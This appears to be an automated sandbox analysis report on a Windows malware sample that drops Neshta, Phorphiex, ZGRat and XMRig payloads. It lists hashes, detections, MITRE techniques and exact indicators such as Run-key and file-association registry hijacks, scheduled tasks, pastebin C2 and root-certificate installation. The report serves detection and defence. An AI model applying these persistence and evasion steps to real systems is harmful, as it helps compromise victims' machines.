neshta | 2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce

Resubmissions

09-04-2024 08:32

240409-kfg77aaf85 10

09-04-2024 08:32

09-04-2024 08:32

09-04-2024 08:32

11-03-2024 08:03

10-03-2024 15:15

Analysis

max time kernel
304s
max time network
1053s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
10-03-2024 15:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

FUCKER.exe
Size

10KB
MD5

2a94f3960c58c6e70826495f76d00b85
SHA1

e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
SHA256

2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
SHA512

fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
SSDEEP

192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K

Score

10^/10

neshta phorphiex xmrig zgrat evasion loader miner persistence rat spyware stealer trojan upx worm

Malware Config

Signatures

Detect Neshta payload 13 IoCs

resource	yara_rule
behavioral1/files/0x0006000000016d6f-269.dat	family_neshta
behavioral1/files/0x0006000000016d6f-263.dat	family_neshta
behavioral1/files/0x0006000000016d6f-270.dat	family_neshta
behavioral1/memory/2948-380-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral1/memory/2948-381-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral1/memory/2948-409-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral1/memory/2948-436-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral1/memory/2948-444-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral1/memory/2948-446-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral1/memory/2948-448-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral1/files/0x0005000000018683-451.dat	family_neshta
behavioral1/memory/2508-465-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral1/memory/1248-477-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta

Detect ZGRat V1 3 IoCs

resource	yara_rule
behavioral1/memory/1952-855-0x0000000000C90000-0x0000000001194000-memory.dmp	family_zgrat_v1
behavioral1/memory/2272-922-0x00000000013B0000-0x00000000018B4000-memory.dmp	family_zgrat_v1
behavioral1/files/0x0007000000017554-4569.dat	family_zgrat_v1

Neshta
Malware from the neshta family is designed to infect itself into other files to spread itself and cause damage.
persistence spyware neshta
Phorphiex
Malware family which infects systems to distribute other malicious payloads such as ransomware, stealers and cryptominers.
worm trojan loader phorphiex

Phorphiex payload 1 IoCs

resource	yara_rule
behavioral1/files/0x000700000001ad4f-5608.dat	family_phorphiex

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 2836 created 1076	2836	pinguin.exe	27

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 17 IoCs

miner

resource	yara_rule
behavioral1/memory/2124-179-0x0000000140000000-0x0000000140840000-memory.dmp	xmrig
behavioral1/memory/2124-180-0x0000000140000000-0x0000000140840000-memory.dmp	xmrig
behavioral1/memory/2124-181-0x0000000140000000-0x0000000140840000-memory.dmp	xmrig
behavioral1/memory/2124-183-0x0000000140000000-0x0000000140840000-memory.dmp	xmrig
behavioral1/memory/2124-182-0x0000000140000000-0x0000000140840000-memory.dmp	xmrig
behavioral1/memory/2124-184-0x0000000140000000-0x0000000140840000-memory.dmp	xmrig
behavioral1/memory/2124-185-0x0000000140000000-0x0000000140840000-memory.dmp	xmrig
behavioral1/memory/2124-186-0x0000000140000000-0x0000000140840000-memory.dmp	xmrig
behavioral1/memory/2124-188-0x0000000140000000-0x0000000140840000-memory.dmp	xmrig
behavioral1/memory/2124-191-0x0000000140000000-0x0000000140840000-memory.dmp	xmrig
behavioral1/memory/2124-192-0x0000000140000000-0x0000000140840000-memory.dmp	xmrig
behavioral1/memory/2124-193-0x0000000140000000-0x0000000140840000-memory.dmp	xmrig
behavioral1/memory/2124-194-0x0000000140000000-0x0000000140840000-memory.dmp	xmrig
behavioral1/memory/2124-195-0x0000000140000000-0x0000000140840000-memory.dmp	xmrig
behavioral1/memory/2124-196-0x0000000140000000-0x0000000140840000-memory.dmp	xmrig
behavioral1/memory/2124-197-0x0000000140000000-0x0000000140840000-memory.dmp	xmrig
behavioral1/memory/2928-963-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig

Creates new service(s) 1 TTPs
persistence

Windows Service
T1543.003
Downloads MZ/PE file

Sets file execution options in registry 2 TTPs 25 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\masscan.exe	$77_loader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nlx64.exe\PerfOptions	$77_loader.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$77_executeoracle.exe\PerfOptions\CpuPriorityClass = "3"	$77_loader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe	$77_loader.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netstat.exe\PerfOptions\CpuPriorityClass = "3"	$77_loader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options	$77_loader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nlbrute.exe	$77_loader.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nlx64.exe\PerfOptions\CpuPriorityClass = "3"	$77_loader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$77_executeoracle.exe	$77_loader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\PerfOptions	$77_loader.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\PerfOptions\CpuPriorityClass = "3"	$77_loader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netstat.exe\PerfOptions	$77_loader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$77_loader.exe	$77_loader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$77_oracle.exe\PerfOptions	$77_loader.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\masscan.exe\PerfOptions\CpuPriorityClass = "3"	$77_loader.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$77_loader.exe\PerfOptions\CpuPriorityClass = "3"	$77_loader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nlbrute.exe\PerfOptions	$77_loader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nlx64.exe	$77_loader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netstat.exe	$77_loader.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nlbrute.exe\PerfOptions\CpuPriorityClass = "3"	$77_loader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\masscan.exe\PerfOptions	$77_loader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$77_loader.exe\PerfOptions	$77_loader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$77_oracle.exe	$77_loader.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$77_oracle.exe\PerfOptions\CpuPriorityClass = "3"	$77_loader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$77_executeoracle.exe\PerfOptions	$77_loader.exe

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Drops startup file 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sc.exe	sc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sc.exe	sc.exe

Executes dropped EXE 12 IoCs

pid	Process
2932	TrumTrum.exe
2836	pinguin.exe
1784	nc64.exe
1088	liveupdate.exe
2680	sc.exe
2452	$77_loader.exe
2948	Zenith_Hub_20240229201747443.exe
2724	Zenith_Hub_20240229201747443.exe
2508	svchost.com
884	DIGITA~1.EXE
1248	svchost.com
2880	svchost.com

Loads dropped DLL 28 IoCs

pid	Process
1076	FUCKER.exe
1076	FUCKER.exe
1076	FUCKER.exe
1076	FUCKER.exe
1076	FUCKER.exe
1472	Process not Found
2836	pinguin.exe
1088	liveupdate.exe
2668	cmd.exe
1076	FUCKER.exe
1076	FUCKER.exe
1076	FUCKER.exe
1076	FUCKER.exe
2948	Zenith_Hub_20240229201747443.exe
2948	Zenith_Hub_20240229201747443.exe
1608	Process not Found
2948	Zenith_Hub_20240229201747443.exe
2948	Zenith_Hub_20240229201747443.exe
2948	Zenith_Hub_20240229201747443.exe
2032	WerFault.exe
2032	WerFault.exe
2032	WerFault.exe
2032	WerFault.exe
2032	WerFault.exe
2032	WerFault.exe
2032	WerFault.exe
2508	svchost.com
2508	svchost.com

Modifies system executable filetype association 2 TTPs 1 IoCs

persistence

Modify Registry

T1112

Change Default File Association

T1546.001

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*"	Zenith_Hub_20240229201747443.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 11 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0036000000015da9-65.dat	upx
behavioral1/files/0x0036000000015da9-64.dat	upx
behavioral1/files/0x0036000000015da9-68.dat	upx
behavioral1/files/0x0036000000015da9-70.dat	upx
behavioral1/memory/2932-72-0x0000000000B00000-0x0000000001963000-memory.dmp	upx
behavioral1/memory/2932-73-0x0000000000B00000-0x0000000001963000-memory.dmp	upx
behavioral1/memory/952-821-0x0000000000400000-0x0000000000930000-memory.dmp	upx
behavioral1/memory/952-924-0x0000000000400000-0x0000000000930000-memory.dmp	upx
behavioral1/memory/2928-959-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral1/memory/2928-963-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral1/files/0x000500000001a49b-4470.dat	upx

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\Windows\CurrentVersion\Run\sc.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\sc.exe"	sc.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
207	pastebin.com
183	pastebin.com
184	pastebin.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
149	ip-api.com
159	ipinfo.io
161	ipinfo.io

Modifies powershell logging option 1 TTPs
evasion

Modify Registry
T1112

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 1088 set thread context of 2668	1088	liveupdate.exe	38
PID 1888 set thread context of 2124	1888	certutil.exe	44

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\PROGRA~2\Adobe\READER~1.0\Reader\AcroRd32.exe	Zenith_Hub_20240229201747443.exe
File opened for modification	C:\PROGRA~2\Adobe\READER~1.0\Reader\ADOBEC~1.EXE	Zenith_Hub_20240229201747443.exe
File opened for modification	C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~1.EXE	Zenith_Hub_20240229201747443.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Office14\BCSSync.exe	Zenith_Hub_20240229201747443.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Office14\MSOSYNC.EXE	Zenith_Hub_20240229201747443.exe
File opened for modification	C:\PROGRA~2\WI54FB~1\WMPDMC.exe	Zenith_Hub_20240229201747443.exe
File opened for modification	C:\PROGRA~2\Adobe\READER~1.0\Reader\A3DUTI~1.EXE	Zenith_Hub_20240229201747443.exe
File opened for modification	C:\PROGRA~2\COMMON~1\MICROS~1\EQUATION\EQNEDT32.EXE	Zenith_Hub_20240229201747443.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Office14\GROOVEMN.EXE	Zenith_Hub_20240229201747443.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Office14\misc.exe	Zenith_Hub_20240229201747443.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Office14\MSOHTMED.EXE	Zenith_Hub_20240229201747443.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Office14\MSTORDB.EXE	Zenith_Hub_20240229201747443.exe
File opened for modification	C:\PROGRA~2\COMMON~1\Adobe\Updater6\ADOBE_~1.EXE	Zenith_Hub_20240229201747443.exe
File opened for modification	C:\PROGRA~2\COMMON~1\MICROS~1\MSInfo\msinfo32.exe	Zenith_Hub_20240229201747443.exe
File opened for modification	C:\PROGRA~2\COMMON~1\MICROS~1\OFFICE14\LICLUA.EXE	Zenith_Hub_20240229201747443.exe
File opened for modification	C:\PROGRA~2\WINDOW~1\WinMail.exe	Zenith_Hub_20240229201747443.exe
File opened for modification	C:\PROGRA~2\WINDOW~2\ACCESS~1\wordpad.exe	Zenith_Hub_20240229201747443.exe
File opened for modification	C:\PROGRA~2\WINDOW~4\ImagingDevices.exe	Zenith_Hub_20240229201747443.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Office14\ACCICONS.EXE	Zenith_Hub_20240229201747443.exe
File opened for modification	C:\PROGRA~2\WI54FB~1\wmlaunch.exe	Zenith_Hub_20240229201747443.exe
File opened for modification	C:\PROGRA~3\PACKAG~1\{33D1F~1\VCREDI~1.EXE	Zenith_Hub_20240229201747443.exe
File opened for modification	C:\PROGRA~3\PACKAG~1\{4D8DC~1\VC_RED~1.EXE	Zenith_Hub_20240229201747443.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Office14\MSTORE.EXE	Zenith_Hub_20240229201747443.exe
File opened for modification	C:\PROGRA~2\WINDOW~1\wabmig.exe	Zenith_Hub_20240229201747443.exe
File opened for modification	C:\PROGRA~2\WI54FB~1\wmpshare.exe	Zenith_Hub_20240229201747443.exe
File opened for modification	C:\PROGRA~2\COMMON~1\MICROS~1\TextConv\WksConv\Wkconv.exe	Zenith_Hub_20240229201747443.exe
File opened for modification	C:\PROGRA~2\COMMON~1\MICROS~1\VSTO\10.0\VSTOIN~1.EXE	Zenith_Hub_20240229201747443.exe
File opened for modification	C:\PROGRA~2\Google\Update\1336~1.151\GO664E~1.EXE	Zenith_Hub_20240229201747443.exe
File opened for modification	C:\PROGRA~2\INTERN~1\ielowutil.exe	Zenith_Hub_20240229201747443.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Office14\MSQRY32.EXE	Zenith_Hub_20240229201747443.exe
File opened for modification	C:\PROGRA~2\MOZILL~1\MAINTE~1.EXE	Zenith_Hub_20240229201747443.exe
File opened for modification	C:\PROGRA~2\WI54FB~1\wmpconfig.exe	Zenith_Hub_20240229201747443.exe
File opened for modification	C:\PROGRA~2\WI54FB~1\wmplayer.exe	Zenith_Hub_20240229201747443.exe
File opened for modification	C:\PROGRA~2\WI4223~1\sidebar.exe	Zenith_Hub_20240229201747443.exe
File opened for modification	C:\PROGRA~2\Adobe\READER~1.0\Reader\ACROBR~1.EXE	Zenith_Hub_20240229201747443.exe
File opened for modification	C:\PROGRA~2\INTERN~1\ieinstal.exe	Zenith_Hub_20240229201747443.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Office14\CNFNOT32.EXE	Zenith_Hub_20240229201747443.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Office14\IECONT~1.EXE	Zenith_Hub_20240229201747443.exe
File opened for modification	C:\PROGRA~2\Adobe\READER~1.0\Reader\LOGTRA~1.EXE	Zenith_Hub_20240229201747443.exe
File opened for modification	C:\PROGRA~2\COMMON~1\MICROS~1\DW\DW20.EXE	Zenith_Hub_20240229201747443.exe
File opened for modification	C:\PROGRA~2\COMMON~1\MICROS~1\OFFICE14\OFFICE~1\Setup.exe	Zenith_Hub_20240229201747443.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Office14\WORDICON.EXE	Zenith_Hub_20240229201747443.exe
File opened for modification	C:\PROGRA~2\COMMON~1\MICROS~1\OFFICE14\OFFICE~1\ODeploy.exe	Zenith_Hub_20240229201747443.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Office14\ONENOTEM.EXE	Zenith_Hub_20240229201747443.exe
File opened for modification	C:\PROGRA~2\Adobe\READER~1.0\Reader\Eula.exe	Zenith_Hub_20240229201747443.exe
File opened for modification	C:\PROGRA~2\COMMON~1\MICROS~1\OFFICE14\FLTLDR.EXE	Zenith_Hub_20240229201747443.exe
File opened for modification	C:\PROGRA~2\COMMON~1\MICROS~1\SOURCE~1\OSE.EXE	Zenith_Hub_20240229201747443.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Office14\1033\ONELEV.EXE	Zenith_Hub_20240229201747443.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Office14\NAMECO~1.EXE	Zenith_Hub_20240229201747443.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Office14\WINWORD.EXE	Zenith_Hub_20240229201747443.exe
File opened for modification	C:\PROGRA~3\PACKAG~1\{CA675~1\VCREDI~1.EXE	Zenith_Hub_20240229201747443.exe
File opened for modification	C:\PROGRA~3\PACKAG~1\{EF6B0~1\VCREDI~1.EXE	Zenith_Hub_20240229201747443.exe
File opened for modification	C:\PROGRA~2\COMMON~1\MICROS~1\OFFICE14\MSOICONS.EXE	Zenith_Hub_20240229201747443.exe
File opened for modification	C:\PROGRA~2\COMMON~1\MICROS~1\OFFICE14\Oarpmany.exe	Zenith_Hub_20240229201747443.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Office14\PPTICO.EXE	Zenith_Hub_20240229201747443.exe
File opened for modification	C:\PROGRA~2\COMMON~1\MICROS~1\DW\DWTRIG20.EXE	Zenith_Hub_20240229201747443.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Office14\POWERPNT.EXE	Zenith_Hub_20240229201747443.exe
File opened for modification	C:\PROGRA~2\Adobe\READER~1.0\Resource\Icons\SC_REA~1.EXE	Zenith_Hub_20240229201747443.exe
File opened for modification	C:\PROGRA~2\Adobe\READER~1.0\SETUPF~1\{AC76B~1\Setup.exe	Zenith_Hub_20240229201747443.exe
File opened for modification	C:\PROGRA~2\Google\Update\1336~1.151\GOF5E2~1.EXE	Zenith_Hub_20240229201747443.exe
File opened for modification	C:\PROGRA~2\Google\Update\DISABL~1.EXE	Zenith_Hub_20240229201747443.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Office14\CLVIEW.EXE	Zenith_Hub_20240229201747443.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Office14\MSOUC.EXE	Zenith_Hub_20240229201747443.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Office14\ONENOTE.EXE	Zenith_Hub_20240229201747443.exe

Drops file in Windows directory 7 IoCs

description	ioc	Process
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	Zenith_Hub_20240229201747443.exe
File created	C:\Windows\SoftwareDistribution\config.xml	$77_loader.exe
File opened for modification	C:\Windows\SoftwareDistribution\config.xml	$77_loader.exe
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com

Launches sc.exe 9 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2000	sc.exe
4780	sc.exe
4528	sc.exe
4944	sc.exe
2680	sc.exe
3792	sc.exe
3108	sc.exe
3616	sc.exe
3684	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 9 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
3372	schtasks.exe
1112	schtasks.exe
4040	schtasks.exe
4296	schtasks.exe
2140	schtasks.exe
2576	schtasks.exe
2768	schtasks.exe
2184	schtasks.exe
1936	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
1908	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Gathers network information 2 TTPs 6 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
2328	NETSTAT.EXE
2424	NETSTAT.EXE
1636	NETSTAT.EXE
1564	NETSTAT.EXE
1620	NETSTAT.EXE
2552	NETSTAT.EXE

Modifies registry class 1 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*"	Zenith_Hub_20240229201747443.exe

Modifies system certificate store 2 TTPs 6 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d0030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	FUCKER.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa20f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349040000000100000010000000497904b0eb8719ac47b0bc11519b74d0200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	FUCKER.exe
Key created	\REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\SystemCertificates\CA\Certificates\D89E3BD43D5D909B47A18977AA9D5CE36CEE184C	FUCKER.exe
